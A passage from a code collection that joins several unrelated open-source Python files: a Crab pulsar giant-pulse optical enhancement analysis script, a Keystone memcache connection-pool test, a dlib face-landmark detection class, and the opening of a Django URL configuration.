m = mpfit.mpfit(gaussian, functkw=fa, parinfo=parinfo, maxiter=1000, quiet=quiet)
if m.status <= 0:
print m.status, m.errmsg
mpp = m.params #The fit params
mpperr = m.perror
for k,p in enumerate(mpp):
parinfo[k]['value'] = p
parinfo[k]['error'] = mpperr[k]
#print parinfo[k]['parname'],p," +/- ",mpperr[j]
if k==0: sigma = p
if k==1: x_offset = p
if k==2: amplitude = p
if k==3: y_offset = p
fineXdata = np.linspace(np.min(xdata),np.max(xdata),100.)
gaussfit = y_offset + amplitude * np.exp( - (( xdata - x_offset)**2) / ( 2. * (sigma**2)))
fineGaussFit = y_offset + amplitude * np.exp( - (( fineXdata - x_offset)**2) / ( 2. * (sigma**2)))
resolution = np.abs(x_offset/(2.355*sigma))
return {'gaussfit':gaussfit,'resolution':resolution,'sigma':sigma,'x_offset':x_offset,'amplitude':amplitude,'y_offset':y_offset,'fineXdata':fineXdata,'fineGaussFit':fineGaussFit,'parinfo':parinfo}
# common setup for matplotlib
params = {'savefig.dpi': 300, # save figures to 300 dpi
'axes.labelsize': 14,
'lines.linewidth': 1.5,
'text.fontsize': 14,
'legend.fontsize': 14,
'xtick.labelsize': 14,
'ytick.major.pad': 6,
'xtick.major.pad': 6,
'ytick.labelsize': 14}
# use of Sans Serif also in math mode
rc('text.latex', preamble='\usepackage{sfmath}')
rcParams.update(params)
phaseShift = 1.-0.677001953125#found with findOpticalPeak.py
def align_yaxis(ax1, v1, ax2, v2):
"""
adjust ax2 ylimit so that v2 in ax2 is aligned to v1 in ax1
Taken from http://stackoverflow.com/questions/10481990/matplotlib-axis-with-two-scales-shared-origin
"""
_, y1 = ax1.transData.transform((0, v1))
_, y2 = ax2.transData.transform((0, v2))
inv = ax2.transData.inverted()
_, dy = inv.transform((0, 0)) - inv.transform((0, y1-y2))
miny, maxy = ax2.get_ylim()
ax2.set_ylim(miny+dy, maxy+dy)
def indexToPhase(indices):
radioIndexOffset = 0.5#Guppi offset, found as shift in unrotated,rotated radio profiles
radioArrivalPhases = (indices+radioIndexOffset)/2048.+phaseShift
return radioArrivalPhases
def nSigma(pvalue):
return scipy.special.erfinv(pvalue)*np.sqrt(2.)
np.seterr(divide='ignore')
np.set_printoptions(threshold=np.nan)
path = '/Scratch/dataProcessing/crabData2/'
nIdxToCheck = 81
nSigmaRadioCutoff = 3
nBins = 250
bUseFineIndexBins = False
bInterpulses = False
#dataFilePath = path+'indPulseProfiles_{}sigma_{}_{}phaseBins_swap.h5'.format(nSigmaRadioCutoff,nIdxToCheck,nBins)
dataFilePath = path+'indPulseProfiles_{}sigma_P1_KS.h5'.format(nSigmaRadioCutoff)
dataFile = tables.openFile(dataFilePath,mode='r')
radioMax = dataFile.root.radioMax.read()
counts = dataFile.root.counts.read()#-dataFile.root.skyCounts.read()
giantPulseNumbers = dataFile.root.giantPulseNumbers.read()
pulseNumberTable = dataFile.root.pulseNumberTable.read()
giantPulseNumberMask = dataFile.root.giantPulseNumberMask.read()
idxOffsets = dataFile.root.idxOffsets.read()
indProfiles = dataFile.root.indProfiles.read()
radioIndices = dataFile.root.radioIndices.read()
overlapPNs = np.load('overlapP1.npz')['overlap']
mainPulseMask = np.logical_not(np.in1d(giantPulseNumbers,overlapPNs))
#mainPulseMask = np.logical_not(mainPulseMask)
radioMax = radioMax[mainPulseMask]
counts = counts[mainPulseMask]
giantPulseNumbers = giantPulseNumbers[mainPulseMask]
pulseNumberTable = pulseNumberTable[mainPulseMask]
giantPulseNumberMask = giantPulseNumberMask[mainPulseMask]
indProfiles = indProfiles[mainPulseMask]
radioIndices = radioIndices[mainPulseMask]
#radioIndexBins=np.array([1369,1371,1373,1375,1378,1381,1385,1389,1395])-.5
#radioIndexBinsFine = np.arange(1369,1396)-.5
radioIndexBins = np.arange(143,179,1)-.5
radioIndexBinsFine = np.arange(143,179)-.5
if bUseFineIndexBins == True:#For statistical test, use fine binning, for figure, use coarse
radioIndexBins = radioIndexBinsFine
startRadioIndex = radioIndexBins[0]
endRadioIndex = radioIndexBins[-1]
probDict = probsOfGRP(startPeakIndex=startRadioIndex,endPeakIndex=endRadioIndex)
probPhaseBins = probDict['radioPhaseBins']
probPeakDist = probDict['peakDist']
#a mask for less good data, during bright or dim times
dimMask = np.ones(len(counts))
idx0 = np.searchsorted(idxOffsets,0)
dimMask[counts[:,idx0]==0]=0
lineCounts = np.mean(counts,axis=1)
meanLineCounts = np.mean(lineCounts[lineCounts!=0])
stdLineCounts = np.std(lineCounts[lineCounts!=0])
stdPercentCutoff=0.
upperCutoff = scipy.stats.scoreatpercentile(lineCounts,100.-stdPercentCutoff)
lowerCutoff = scipy.stats.scoreatpercentile(lineCounts,stdPercentCutoff)
dimMask[lineCounts>upperCutoff] = 0
dimMask[lineCounts<lowerCutoff] = 0
dimMask = (dimMask==1)
radioStrength = radioMax
indProfilesMask = np.tile(giantPulseNumberMask,(np.shape(indProfiles)[2],1,1))
indProfilesMask = np.swapaxes(indProfilesMask,0,2)
indProfilesMask = np.swapaxes(indProfilesMask,0,1)
indProfilesMasked = np.ma.array(indProfiles,mask=indProfilesMask)
nIdxOffsets = len(idxOffsets)
#sum over GRP index, to get number of nonzero pulses in each index
# this will be used to scale later
nPulsesPerIdx = np.array(np.sum(giantPulseNumberMask,axis=0),dtype=np.double).reshape((-1,1))
cmap = matplotlib.cm.jet
histStart = 0.
histEnd = 1.
nBins=np.shape(indProfiles)[2]
_,phaseBinEdges = np.histogram(np.array([0]),range=(histStart,histEnd),bins=nBins)
phaseBinEdges+=phaseShift
phaseBinCenters = phaseBinEdges[0:-1]+np.diff(phaseBinEdges)/2.
grpProfile = np.ma.mean(indProfilesMasked.data[:,idx0],axis=0)
peakIdx = np.argmax(grpProfile)
peakBins = range(peakIdx-1,peakIdx+2)
print 'opticalPeakPhaseBins',peakBins
nRadioBins=15
radioStrengthCutoff = .155#0.155
radioCutoffMask = radioStrength >= radioStrengthCutoff
strongMask = np.logical_and(radioCutoffMask,dimMask)
#finalMask = np.logical_and(strongMask,radioPeakMask)
radioPhaseMask = np.logical_and(radioIndices >= 143,radioIndices <= 178)
#radioPhaseMask = np.logical_and(radioIndices >= np.min(radioIndices),radioIndices <= np.max(radioIndices))
finalMask = np.logical_and(strongMask,radioPhaseMask)
print 'GRP above',radioStrengthCutoff,':',np.sum(finalMask),'and in phase range'
#counts color plot
fig = plt.figure()
ax = fig.add_subplot(111)
handleMatshow = ax.matshow(counts[finalMask])
ax.set_aspect(1.0*np.shape(counts[finalMask])[1]/np.shape(counts[finalMask])[0])
fig.colorbar(handleMatshow)
overallCoincidentProfile = np.mean(indProfiles[finalMask,idx0,:],axis=0)
surroundingProfiles = np.ma.mean(indProfilesMasked[finalMask,:],axis=0)
avgProfile = np.ma.mean(surroundingProfiles,axis=0)
minProfileIndex = np.argmin(avgProfile)
#for the sky level take an average over 5 points at the lowest part of the period
skyLevel = np.mean(avgProfile[minProfileIndex-3:minProfileIndex+3])
avgProfileErrors = np.ma.std(surroundingProfiles,axis=0)/np.sqrt(nIdxOffsets)#std over iIdxOffset /sqrt(N) to get error in avgProfile
#add errors in quadrature
skySigma = np.sqrt(np.sum(avgProfileErrors[minProfileIndex-3:minProfileIndex+3]**2.))
#should check error in sky level at some point
print 'sky level',skyLevel,'+/-',skySigma
overallCoincidentProfile-=skyLevel
surroundingProfiles-=skyLevel
avgProfile-=skyLevel
indProfiles-=skyLevel
avgOverallProfile = avgProfile
stdProfile = np.ma.std(surroundingProfiles,axis=0)#std over iIdxOffset
stdProfile = np.sqrt(stdProfile**2+skySigma**2)
avgStdProfile = stdProfile/np.sqrt(nIdxOffsets-1)
giantPeakHeight = np.sum(overallCoincidentProfile[peakBins])
peakHeight = np.sum(avgProfile[peakBins])
peakSigma = np.sqrt(np.sum(stdProfile[peakBins]**2))
overallEnhancement = (giantPeakHeight-peakHeight)/peakHeight
enhancementNSigma = (giantPeakHeight-peakHeight)/peakSigma
enhancementError = peakSigma/peakHeight
overallEnhancementError = enhancementError
print 'peak enhancement of avg above',radioStrengthCutoff,':',overallEnhancement,'+/-',enhancementError,'(',enhancementNSigma,' sigma)'
overallPeakHeight = np.array(peakHeight)
allProfiles = np.array(surroundingProfiles.data)
allProfiles[idx0]=overallCoincidentProfile#add back in since it was masked and zeroed earlier
allPeakHeights = np.sum(allProfiles[:,peakBins],axis=1)
peakPercentDifferenceByIdxOffset = (allPeakHeights-peakHeight)/peakHeight
nSigmaByIdxOffset = (allPeakHeights-peakHeight)/peakSigma
#significance figure
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(idxOffsets,np.abs(nSigmaByIdxOffset),'k')
ax.set_ylabel('Standard Deviations of Peak Height from Average Peak')
ax.set_xlabel('Pulse Offset Relative to GRP (number of periods)')
ax.set_ylim((0,4.5))
np.savez('sigP1.npz',idxOffsets=idxOffsets,nSigmaByIdxOffset=nSigmaByIdxOffset)
giantPeakHeights = np.sum(indProfiles[:,idx0,peakBins][finalMask],axis=1)
peakHeights = np.sum(indProfiles[:,:,peakBins][finalMask],axis=2)
#index peakHeights[iGRP,iIdxOffset]
maskedPeakHeights = np.ma.array(peakHeights,mask=giantPulseNumberMask[finalMask])
avgPeakHeights = np.ma.mean(maskedPeakHeights,axis=1)#average over iIdxOffset i.e. average of surrounding pulses for each iGRP
opticalEnhancementGRP = (giantPeakHeights-avgPeakHeights)/avgPeakHeights
opticalEnhancement = (avgPeakHeights-overallPeakHeight)/overallPeakHeight
radioProfile = np.loadtxt(path+'radio/RadioProfile_LyneDM_TZRCorrect_withGUPPIdelay.txt',skiprows=1,usecols=[3])
nRadioPhaseBins = len(radioProfile)
radioProfilePhaseBins = (1.*np.arange(nRadioPhaseBins)+.5)/nRadioPhaseBins
radioProfilePhaseBins+=phaseShift
fig = plt.figure()
ax = fig.add_subplot(111)
ax2 = ax.twinx()
pltHandle2 = ax2.plot(radioProfilePhaseBins,radioProfile,c=(.4,.5,.8),label='Radio Pulse')
pltHandle0 = ax.errorbar(phaseBinCenters,overallCoincidentProfile,yerr=stdProfile,c='k',label='Optical GRP-coincident Pulse')
pltHandle1 = ax.plot(phaseBinCenters,avgProfile,c='r',label='Optical non-GRP-coincident Pulse')
pltHandles = [pltHandle0,pltHandle1[0],pltHandle2[0]]
pltLabels = [pltHandle.get_label() for pltHandle in pltHandles]
box = ax.get_position()
ax.set_position([box.x0, box.y0 + box.height * 0.15,
box.width, box.height * 0.85])
ax2.set_position([box.x0, box.y0 + box.height * 0.15,
box.width, box.height * 0.85])
ax.set_ylim((0.055,.081))
ax2.set_ylim((.11,.155))
ax.set_xlim((0.97,1.005))
locator = matplotlib.ticker.MultipleLocator(.01)
ax2.yaxis.set_major_locator(locator)
ax.legend(pltHandles,pltLabels,loc='upper center', bbox_to_anchor=(0.5, -0.1),
fancybox=True, shadow=True, ncol=2)
ax.set_ylabel('Optical Counts per Period per Pixel')
ax.set_xlabel('Phase')
ax2.set_ylabel('Normalized Radio Intensity')
#enhanced profile figure
#fig = plt.figure(figsize=(1.8,2))
ax = fig.add_subplot(2,2,1)
#ax = fig.add_axes([0.,.6,.4,.4])
doublePhaseBins = np.concatenate([phaseBinCenters-1,phaseBinCenters,1+phaseBinCenters])
doubleOverallCoincidentProfile = np.concatenate([overallCoincidentProfile,overallCoincidentProfile,overallCoincidentProfile])
doubleStdProfile = np.concatenate([stdProfile,stdProfile,stdProfile])
doubleAvgProfile = np.concatenate([avgProfile,avgProfile,avgProfile])
doubleRadioProfilePhaseBins = np.concatenate([radioProfilePhaseBins-1,radioProfilePhaseBins,1+radioProfilePhaseBins])
doubleRadioProfile = np.concatenate([radioProfile,radioProfile,radioProfile])
ax2 = ax.twinx()
pltHandle2 = ax2.plot(doubleRadioProfilePhaseBins,doubleRadioProfile,c=(.4,.5,.8),label='Radio Pulse')
pltHandle0 = ax.plot(doublePhaseBins,doubleOverallCoincidentProfile,c='k',label='Optical GRP-coincident Pulse')
pltHandle1 = ax.plot(doublePhaseBins,doubleAvgProfile,c='r',label='Optical non-GRP-coincident Pulse')
pltHandles = [pltHandle0[0],pltHandle1[0],pltHandle2[0]]
pltLabels = [pltHandle.get_label() for pltHandle in pltHandles]
#rect = plt.Rectangle((.970,0.055),1.005-.970,.081-0.055,edgecolor='green',fill=True,linewidth=2.)
#ax.add_patch(rect)
ax.yaxis.set_visible(False)
ax2.yaxis.set_visible(False)
ax.set_ylim((-.005,.081))
ax2.set_ylim((-.01,.155))
ax.set_xlim((0.01,1.99))
ax.set_xlabel('Phase')
#ax.xaxis.label.set_size(14)
#ax.tick_params(axis='both', which='major', labelsize=12)
#ax2.tick_params(axis='both', which='major', labelsize=12)
box = ax.get_position()
ax.set_position([box.x0, box.y0 + box.height * 0.3,
box.width*.8, box.height * 0.7])
ax2.set_position([box.x0, box.y0 + box.height * 0.3,
box.width*.8, box.height * 0.7])
radioProfile = radioProfile*np.max(overallCoincidentProfile)/np.max(radioProfile)
#Now plot optical enhancement vs radio arrival time
radioPhases = indexToPhase(radioIndices)
radioPhaseBins = indexToPhase(radioIndexBins)
radioPhaseBinCenters = radioPhaseBins[0:-1]+np.diff(radioPhaseBins)/2.
print 'radioIndexBins',radioIndexBins,np.diff(radioIndexBins)
print 'radioPhaseBinEdges',radioPhaseBins,np.diff(radioPhaseBins)
radioBinned = np.digitize(radioPhases,bins=radioPhaseBins)
enhancements = []
enhancementNSigmas = []
enhancementNSigmasOverOverall = []
enhancementErrors = []
globalEnhancements = []
globalEnhancementErrors = []
#non-GRP pulse enhancements
profiles = []
radioStrengthCutoff = .155#0.155
radioCutoffMask = radioStrength >= radioStrengthCutoff
strongMask = np.logical_and(radioCutoffMask,dimMask)
strongMask = np.logical_and(strongMask,radioPhaseMask)
for iBin,bin in enumerate(radioPhaseBins[0:-1]):
binMask = np.logical_and(radioBinned==(iBin+1),strongMask)
binProfile = np.mean(indProfiles[binMask,idx0,:],axis=0)
profiles.append(binProfile)
phasesInBin = radioPhases[binMask]
surroundingProfiles = np.ma.mean(indProfilesMasked[binMask,:],axis=0)
avgProfile = np.ma.mean(surroundingProfiles,axis=0)
stdProfile = np.ma.std(surroundingProfiles,axis=0)#std over iIdxOffset
nSurroundingProfiles=np.sum(np.logical_not(surroundingProfiles.mask),axis=0)
errorAvgProfile = np.divide(stdProfile,np.sqrt(nSurroundingProfiles))
giantPeakHeight = np.sum(binProfile[peakBins])
peakHeight = np.sum(avgProfile[peakBins])
peakSigma = np.sqrt(np.sum(stdProfile[peakBins]**2))
enhancement = (giantPeakHeight-peakHeight)/peakHeight
enhancementNSigma = (giantPeakHeight-peakHeight)/peakSigma
enhancementError = peakSigma/peakHeight
enhancements.append(enhancement)
enhancementNSigmas.append(enhancementNSigma)
enhancementErrors.append(enhancementError)
nSigmaOverOverall=(enhancement-overallEnhancement)/enhancementError
enhancementNSigmasOverOverall.append(nSigmaOverOverall)
#print '{:.3}+/-{:.3}({:.3},{:.3})'.format(enhancement,enhancementError,enhancementNSigma,(enhancement-overallEnhancement)/enhancementError)
print '{}\t{:.5}\t{}\t{:.3}\t{:.3}\t{:.3}'.format(radioIndexBins[iBin],bin,np.sum(binMask),enhancement,enhancementError,nSigmaOverOverall)
globalEnhancement = (giantPeakHeight-overallPeakHeight)/overallPeakHeight
globalEnhancementError = peakSigma/overallPeakHeight
globalEnhancements.append(globalEnhancement)
globalEnhancementErrors.append(globalEnhancementError)
nonGRPEnhancement = (peakHeight-overallPeakHeight)/overallPeakHeight
nonGRPPeakSigma = np.sqrt(np.sum(errorAvgProfile[peakBins])**2)
nonGRPEnhancementNSigma = (peakHeight-overallPeakHeight)/nonGRPPeakSigma
nonGRPEnhancementError = nonGRPPeakSigma/overallPeakHeight
#print 'nonGRP {:.3}+/-{:.3}({:.3})'.format(nonGRPEnhancement,nonGRPEnhancementError,nonGRPEnhancementNSigma)
nextBin = radioPhaseBins[iBin+1]
#ax.plot(phaseBinEdges[0:-1],binProfile-avgProfile,c=color,label='{:.3}-{:.3}'.format(bin,nextBin))
#ax2.errorbar(phaseBinEdges[0:-1],binProfile,yerr=stdProfile,c=color,label='{:.3}-{:.3}'.format(bin,nextBin))
#ax3.errorbar(phaseBinEdges[0:-1],avgProfile,yerr=errorAvgProfile,c=color,label='{:.3}-{:.3}'.format(bin,nextBin))
enhancements = np.array(enhancements)
enhancementErrors = np.array(enhancementErrors)
percentEnhancements = 100.*enhancements
percentEnhancementErrors = 100.*enhancementErrors
fig = plt.figure(figsize=(8.,6.))
#ax = fig.add_subplot(211)
ax = fig.add_axes([.15,.6,.8,.3])
#ax.step(radioIndexBins[0:-1],noiseDist,'g',label='noise detections')
ax.plot(probPhaseBins,np.append(probPeakDist,probPeakDist[-1]),'k',drawstyle='steps-post',label='GRP+noise detections')
ax.set_ylabel('Number of\nGRPs detected')
ax.xaxis.set_visible(False)
ax.xaxis.set_ticks([])
#ax.step(radioIndexBins[0:-1],peakDist,'k',label='GRP+noise detections')
#fig = plt.figure()
#ax = fig.add_subplot(212)
ax2 = fig.add_axes([.15,.1,.8,.5])
#ax.errorbar(radioPhaseBinCenters,100.*enhancements,yerr=100.*enhancementErrors,marker='.',color='k',label='enhancement relative to surrounding nonGRP',linestyle='.')
ax2.errorbar(radioPhaseBinCenters,percentEnhancements,yerr=percentEnhancementErrors,linestyle='.',color='k')
ax2.plot(radioPhaseBins,np.append(percentEnhancements,percentEnhancements[-1]),'k',drawstyle='steps-post',label='enhancement relative to surrounding nonGRP')
opticalPeakPhase = 0.993998046875
ax2.axhline(0.,linewidth=1.,c='k')
ax2.axvline(opticalPeakPhase,c='gray',linestyle='--')
ax2.set_xlabel('GRP Arrival Phase')
ax2.set_ylabel('Optical Enhancement of\nGRP-Coincident Pulses (%)')
ax2.set_xlim((.392,.411))
ax.set_xlim((.392,.411))
fig.text(.175,.85,'(a)',size=16)
ax2.yaxis.get_major_ticks()[-1].label1.set_visible(False)
fig.text(.175,.55,'(b)',size=16)
#ax2.legend(loc='lower left')
fig = plt.figure()
ax = fig.add_subplot(111)
#ax.errorbar(radioPhaseBinCenters,100.*enhancements,yerr=100.*enhancementErrors,marker='.',color='k',label='enhancement relative to surrounding nonGRP',linestyle='.')
ax.errorbar(radioPhaseBinCenters,percentEnhancements,yerr=percentEnhancementErrors,linestyle='.',color='k')
ax.plot(radioPhaseBins,np.append(percentEnhancements,percentEnhancements[-1]),'k',drawstyle='steps-post',label='enhancement relative to surrounding nonGRP')
radioPhaseBinWidths = np.diff(radioPhaseBins)
meanPercentEnhancement = np.average(percentEnhancements,weights = 1/percentEnhancementErrors**2)
errorMeanPercentEnhancement = 1./np.sqrt(np.sum(1/percentEnhancementErrors**2))
print 'weighted average enhancement (%):',meanPercentEnhancement,'+/-',errorMeanPercentEnhancement
chi2=np.sum((percentEnhancements-meanPercentEnhancement)**2/percentEnhancementErrors**2)
dof=len(percentEnhancements)-1 #free parameter: meanEnhancement
pvalue=1-scipy.stats.chi2.cdf(chi2,dof)
print 'flat line: chi2 dof pvalue significance',chi2,dof,pvalue,nSigma(1-pvalue),'sigmas'
gaussDict = fitGauss(xdata=radioPhaseBinCenters,ydata=percentEnhancements,yerr=percentEnhancementErrors)
fit = gaussDict['gaussfit']
ax.plot(radioPhaseBinCenters,fit)
ax.plot(gaussDict['fineXdata'],gaussDict['fineGaussFit'])
chi2Fit=np.sum((percentEnhancements-fit)**2/percentEnhancementErrors**2)
dofFit=len(percentEnhancements)-4 #free parameters:y_offset,x_offset,amplitude,sigma
pvalueFit=1-scipy.stats.chi2.cdf(chi2Fit,dofFit)
print 'gaussian: chi2 dof pvalue significance',chi2Fit,dofFit,pvalueFit,nSigma(1-pvalueFit),'sigmas'
print gaussDict['parinfo']
flatLineDict = fitGauss(xdata=radioPhaseBinCenters,ydata=percentEnhancements,yerr=percentEnhancementErrors,flatLine=True)
fit = flatLineDict['gaussfit']
ax.plot(radioPhaseBinCenters,fit)
ax.plot(flatLineDict['fineXdata'],flatLineDict['fineGaussFit'])
chi2=np.sum((percentEnhancements-fit)**2/percentEnhancementErrors**2)
dof=len(percentEnhancements)-1 #free parameters:y_offset
pvalue=1-scipy.stats.chi2.cdf(chi2,dof)
print 'flatLine: chi2 dof pvalue significance',chi2,dof,pvalue,nSigma(1-pvalue),'sigmas'
print flatLineDict['parinfo']
chi2Diff = chi2-chi2Fit
dofDiff = dof-dofFit
pvalueDiff=1-scipy.stats.chi2.cdf(chi2Diff,dofDiff)
print 'diff: chi2 dof pvalue significance',chi2Diff,dofDiff,pvalueDiff,nSigma(1-pvalueDiff),'sigmas'
plt.show()
|
bmazin/ARCONS-pipeline
|
examples/Pal2012-crab/enhancementPhaseP1.py
|
Python
|
gpl-2.0
| 21,133
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
import time
import mock
import six
from six.moves import queue
import testtools
from testtools import matchers
from keystone.common.cache import _memcache_pool
from keystone import exception
from keystone.tests.unit import core
class _TestConnectionPool(_memcache_pool.ConnectionPool):
destroyed_value = 'destroyed'
def _create_connection(self):
return mock.MagicMock()
def _destroy_connection(self, conn):
conn(self.destroyed_value)
class TestConnectionPool(core.TestCase):
def setUp(self):
super(TestConnectionPool, self).setUp()
self.unused_timeout = 10
self.maxsize = 2
self.connection_pool = _TestConnectionPool(
maxsize=self.maxsize,
unused_timeout=self.unused_timeout)
self.addCleanup(self.cleanup_instance('connection_pool'))
def test_get_context_manager(self):
self.assertThat(self.connection_pool.queue, matchers.HasLength(0))
with self.connection_pool.acquire() as conn:
self.assertEqual(1, self.connection_pool._acquired)
self.assertEqual(0, self.connection_pool._acquired)
self.assertThat(self.connection_pool.queue, matchers.HasLength(1))
self.assertEqual(conn, self.connection_pool.queue[0].connection)
def test_cleanup_pool(self):
self.test_get_context_manager()
newtime = time.time() + self.unused_timeout * 2
non_expired_connection = _memcache_pool._PoolItem(
ttl=(newtime * 2),
connection=mock.MagicMock())
self.connection_pool.queue.append(non_expired_connection)
self.assertThat(self.connection_pool.queue, matchers.HasLength(2))
with mock.patch.object(time, 'time', return_value=newtime):
conn = self.connection_pool.queue[0].connection
with self.connection_pool.acquire():
pass
conn.assert_has_calls(
[mock.call(self.connection_pool.destroyed_value)])
self.assertThat(self.connection_pool.queue, matchers.HasLength(1))
self.assertEqual(0, non_expired_connection.connection.call_count)
def test_acquire_conn_exception_returns_acquired_count(self):
class TestException(Exception):
pass
with mock.patch.object(_TestConnectionPool, '_create_connection',
side_effect=TestException):
with testtools.ExpectedException(TestException):
with self.connection_pool.acquire():
pass
self.assertThat(self.connection_pool.queue,
matchers.HasLength(0))
self.assertEqual(0, self.connection_pool._acquired)
def test_connection_pool_limits_maximum_connections(self):
# NOTE(morganfainberg): To ensure we don't lockup tests until the
# job limit, explicitly call .get_nowait() and .put_nowait() in this
# case.
conn1 = self.connection_pool.get_nowait()
conn2 = self.connection_pool.get_nowait()
# Use a nowait version to raise an Empty exception indicating we would
# not get another connection until one is placed back into the queue.
self.assertRaises(queue.Empty, self.connection_pool.get_nowait)
# Place the connections back into the pool.
self.connection_pool.put_nowait(conn1)
self.connection_pool.put_nowait(conn2)
# Make sure we can get a connection out of the pool again.
self.connection_pool.get_nowait()
def test_connection_pool_maximum_connection_get_timeout(self):
connection_pool = _TestConnectionPool(
maxsize=1,
unused_timeout=self.unused_timeout,
conn_get_timeout=0)
def _acquire_connection():
with connection_pool.acquire():
pass
# Make sure we've consumed the only available connection from the pool
conn = connection_pool.get_nowait()
self.assertRaises(exception.UnexpectedError, _acquire_connection)
# Put the connection back and ensure we can acquire the connection
# after it is available.
connection_pool.put_nowait(conn)
_acquire_connection()
class TestMemcacheClientOverrides(core.BaseTestCase):
def test_client_stripped_of_threading_local(self):
"""threading.local overrides are restored for _MemcacheClient"""
client_class = _memcache_pool._MemcacheClient
# get the genuine thread._local from MRO
thread_local = client_class.__mro__[2]
self.assertTrue(thread_local is threading.local)
for field in six.iterkeys(thread_local.__dict__):
if field not in ('__dict__', '__weakref__'):
self.assertNotEqual(id(getattr(thread_local, field, None)),
id(getattr(client_class, field, None)))
|
takeshineshiro/keystone
|
keystone/tests/unit/common/test_connection_pool.py
|
Python
|
apache-2.0
| 5,436
|
"""
Created on Mon Mar 20 12:28:21 2017
@author: Hriddhi Dey
This module contains the DetectLandmark class.
"""
import os.path
import sys
from urllib.request import urlretrieve
import cv2
import dlib
import numpy
PREDICTOR_PATH = "shape_predictor_68_face_landmarks.dat"
CASC_PATH = "haarcascade_frontalface_default.xml"
class DetectLandmarks(object):
"""
This is the class responsible for landmark detection on a human face.
Functions available for use:
1. get_face_data: Returns all detected landmarks for a face.
2. get_lips: Returns points of lips for a face.
3. get_upper_eyelids: Returns points of eyeliner for a face.
"""
IMAGE_DATA = 'IMAGE_DATA'
FILE_READ = 'FILE_READ'
NETWORK_BYTE_STREAM = 'NETWORK_BYTE_STREAM'
def __init__(self):
""" Initiator for DetectLandmarks class.
Downloads the predictor file if not available.
Raises:
`Exception`, if download of predictor fails.
"""
if not os.path.isfile(PREDICTOR_PATH):
try:
print ('Predictor not found. Downloading...this may take a while...')
url = 'https://github.com/hriddhidey/visage/blob/master/visage/shape_predictor_68_face_landmarks.dat?raw=true'
def dl_progress(count, block_size, total_size):
""" Show download progress bar. """
percent = int(count*block_size*100/total_size)
sys.stdout.write("\r" + 'Progress:' + "...%d%%" % percent)
sys.stdout.flush()
urlretrieve(
url,
PREDICTOR_PATH,
reporthook=dl_progress
)
print ('Predictor downloaded.')
except IOError:
print ('Download failed. Try again with reliable network connection.')
raise IOError
self.predictor = dlib.shape_predictor(PREDICTOR_PATH)
self.cascade = cv2.CascadeClassifier(CASC_PATH)
self.detector = dlib.get_frontal_face_detector()
def __get_landmarks(self, image):
""" Extract the landmarks from a given image.
Returns `None` if no landmarks found.
"""
try:
rects = self.detector(image, 1)
size = len(rects)
if size == 0:
return None, None
return numpy.matrix([[p.x, p.y] for p in self.predictor(image, rects[0]).parts()])
except Exception:
return None
def get_face_data(self, image_file, flag):
"""
Returns all facial landmarks in a given image.
______________________________________________
Args:
1. `image_file`:
Either of three options:\n
a. (int) Image data after being read with cv2.imread()\n
b. File path of locally stored image file.\n
c. Byte stream being received over multipart network request.\n\n
2. `flag`:
Used to denote the type of image_file parameter being passed.
Possible values are IMG_DATA, FILE_READ, NETWORK_BYTE_STREAM respectively.
By default its value is IMAGE_DATA, and assumes imread() image is passed.
Returns:
String with list of detected points of lips.
Error:
Returns `None` if face not found in image.
"""
image = 0
if flag == self.FILE_READ:
image = cv2.imread(image_file)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
elif flag == self.NETWORK_BYTE_STREAM:
image = cv2.imdecode(
numpy.fromstring(image_file.read(), numpy.uint8), cv2.IMREAD_UNCHANGED
)
elif flag == self.IMAGE_DATA or flag is None:
image = image_file
landmarks = self.__get_landmarks(image)
if landmarks[0] is None or landmarks[1] is None:
return None
return landmarks
def get_lips(self, image_file, flag=None):
"""
Returns points for lips in given image.
_______________________________________
Args:
1. `image_file`:
Either of three options:\n
a. (int) Image data after being read with cv2.imread()\n
b. File path of locally stored image file.\n
c. Byte stream being received over multipart network reqeust.\n\n
2. `flag`:
Used to denote the type of image_file parameter being passed.
Possible values are IMG_DATA, FILE_READ, NETWORK_BYTE_STREAM respectively.
By default its value is IMAGE_DATA, and assumes imread() image is passed.
Returns:
String with list of detected points of lips.
Error:
Returns `None` if face not found in image.
"""
landmarks = self.get_face_data(image_file, flag)
if landmarks is None:
return None
lips = ""
for point in landmarks[48:]:
lips += str(point).replace('[', '').replace(']', '') + '\n'
return lips
def get_upper_eyelids(self, image_file, flag=None):
"""
Returns points for upper eyelids in given image.
________________________________________________
Args:
1. `image_file`:
Either of three options:\n
a. (int) Image data after being read with cv2.imread()\n
b. File path of locally stored image file.\n
c. Byte stream being received over multipart network reqeust.\n\n
2. `flag`:
Used to denote the type of image_file parameter being passed.
Possible values are IMG_DATA, FILE_READ, NETWORK_BYTE_STREAM respectively.
By default its value is IMAGE_DATA, and assumes imread() image is passed.
Returns:
String with list of detected points of lips.
Error:
Returns `None` if face not found in image.
"""
landmarks = self.get_face_data(image_file, flag)
if landmarks is None:
return None
liner = ""
for point in landmarks[36:40]:
liner += str(point).replace('[', '').replace(']', '') + '\n'
liner += '\n'
for point in landmarks[42:46]:
liner += str(point).replace('[', '').replace(']', '') + '\n'
return liner
|
hriddhidey/visage
|
visage/detect_features.py
|
Python
|
mit
| 6,555
|
from django.conf.urls import patterns, include, url
from django.conf.urls.defaults import handler404, handler500
from django.contrib import admin
from youtune import settings
from youtune.account import views as account_views, models as account_models
from youtune.frontend import views as frontend_views
from youtune.api import resources, views
from tastypie.api import Api
v1_api = Api(api_name='v1')
v1_api.register(resources.UserProfileResource())
v1_api.register(resources.FileResource())
v1_api.register(resources.ChannelResource())
v1_api.register(resources.CommentResource())
admin.autodiscover()
handler404 = frontend_views.Error404View.as_view()
handler500 = frontend_views.Error500View.as_view()
urlpatterns = patterns(
'',
# Switch to API-based JS views
url(r'^$', views.index, name='index'),
# Upload view
url(r'^upload/', include('youtune.fileupload.urls')),
# API
url(r'^api/', include(v1_api.urls)),
url('^server/',
frontend_views.HomeView.as_view(), name='home'),
url(r'^search',
frontend_views.SearchView.as_view(), name='search'),
url(r'^admin/doc/', include(
'django.contrib.admindocs.urls'), name='admin_doc'),
url(r'^admin/', include(admin.site.urls), name='admin'),
